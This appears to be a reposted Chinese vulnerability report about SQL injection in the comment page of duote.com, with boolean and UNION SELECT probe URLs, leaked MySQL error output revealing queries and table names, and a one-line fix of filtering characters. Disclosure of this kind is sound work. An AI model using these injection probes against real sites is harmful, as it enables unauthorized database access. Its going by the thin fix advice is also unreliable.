网站地图    收藏   

主页 > 后端 > 网站安全 >

多特专题评论sql注射缺陷及修复 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 简要描述:过滤不严导致注入详细说明:哈哈 站太大 有疏忽的时候漏洞证明:http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=1http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=2......

简要描述:过滤不严导致注入
详细说明:哈哈 站太大 有疏忽的时候
漏洞证明:


 

http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=1
http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=2

爆SQL语句
1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by likes' at line 1 SQL= select count(*) as cnt,likes from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 group by likes 1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by vote desc limit 5' at line 1 SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 and vote>0 order by vote desc limit 5 1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by addTime desc limit 0,10' at line 1 SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 order by addTime desc limit 0,10

根据爆出来的SQL语句SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 order by addTime desc limit 0,10’ 我们可以进一步渗透,表的结构例如tab_zt_comment 格式tab_zt_ 进一步可以猜表


修复方案:

过滤字符

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论